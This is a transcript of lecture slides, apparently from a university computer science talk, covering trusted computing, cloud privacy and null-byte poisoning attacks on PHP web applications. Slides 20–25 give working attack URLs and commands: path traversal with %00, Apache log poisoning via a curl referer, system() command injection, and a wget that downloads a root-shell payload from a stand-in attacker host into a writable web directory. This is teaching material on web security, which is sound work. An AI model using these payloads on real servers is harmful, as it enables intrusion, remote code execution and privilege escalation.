1. Trusted computing and the cloud

2. UNR – CSE, Jeff Naruchitparames 2 ( and null-byte poisoning attacks for the web )

3. UNR – CSE, Jeff Naruchitparames 3 Computer architecture Security... privacy Digital & physical threats

4. UNR – CSE, Jeff Naruchitparames 4 1. Identification – cryptographic 2. Attestation – digital signatures 3. Normal operating environment – from the computer's environment (remotely, too!)

5. UNR – CSE, Jeff Naruchitparames 5

6. 6 Control!

7. UNR – CSE, Jeff Naruchitparames 7 Trusted platform module (TPM) Trusted computing group (TCG) Root of trust Dictate accessibility (permissions) a user has

8. UNR – CSE, Jeff Naruchitparames 8 But wait! … this is not a bad thing

9. UNR – CSE, Jeff Naruchitparames 9

10. Software as a Service, SaaS Platform as a Service, PaaS Infrastructure as a Service, IaaS

11. UNR – CSE, Jeff Naruchitparames 11 Problem: Storage Solution: Encryption, duh! Problem: Processing/computation of information Solution: ???

12. UNR – CSE, Jeff Naruchitparames 12 Without looking!

13. UNR – CSE, Jeff Naruchitparames 13 Blind processing Ensuring security and in particular, privacy of information from third parties (sys admins, users, hackers, etc)

14. UNR – CSE, Jeff Naruchitparames 14 Why so important? ISPs Power grid owners Google, Amazon, other web 2.0 companies, etc Political, economic, competition, etc

15. UNR – CSE, Jeff Naruchitparames 15 Technical details for another day... Null-byte poisoning attacks (null- byte injection)

16. UNR – CSE, Jeff Naruchitparames 16 Add URL-encoded null-byte characters (%00, 0x00) to user-supplied data Bypass input sanity checking filters

17. UNR – CSE, Jeff Naruchitparames 17 javascript, ASP Processing accomplished by C/C++ functions

18. UNR – CSE, Jeff Naruchitparames 18 NULL = string termination or delimiter = stop processing a string = bytes following delimiter will be ignored

19. UNR – CSE, Jeff Naruchitparames 19 If a string loses its null character, the length of the string = unknown... … until memory pointer finds the next null byte.

20. UNR – CSE, Jeff Naruchitparames 20 http://foo.org/index.php[?lang=bar] /web/htdocs/foo/ Template file includes, yay! http://foo.org/index.php?lang=../../../etc/password%00

21. UNR – CSE, Jeff Naruchitparames 21 http://foo.org/index.php?lang=../../../proc/self/fd/2%00 Inject shellcode via symbolic links from /proc/self/. This example assumes Apache error logs are located in /proc/self/fd/2 Now what?

22. UNR – CSE, Jeff Naruchitparames 22 Note: Error logs are typically written without filtering referer variables (from browsers) curl “http://foo.org/” -H “Host:” -- referer “ ” [Mon Feb 08 09:27:45 2010] [error] [client x.x.x.x] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /, referer:

23. UNR – CSE, Jeff Naruchitparames 23 http://foo.org/index.php?&lang=../../../proc/self/f d/2%00&cmd=system('pwd') Write issues?! (permissions)

24. UNR – CSE, Jeff Naruchitparames 24 http://foo.org/index.php?&lang=../../../proc/self/fd/2%00&cmd=system('find -Type d -perm 0777') Assume we find a writable directory at: /home/user/public_html/php_fi les_for_school/

25. UNR – CSE, Jeff Naruchitparames 25 Injection time! http://foo.org/index.php?lang=../../../proc/self /fd/2%00&cmd=system('wget -O /home/user/public_html/php_files_for_school/home work3.php http://haxor.website/files/amazing_shellcode_to_ obtain_root_access/get_root_shell.php'); Privilege escalation

26. UNR – CSE, Jeff Naruchitparames 26 Responsible disclosure! YEAH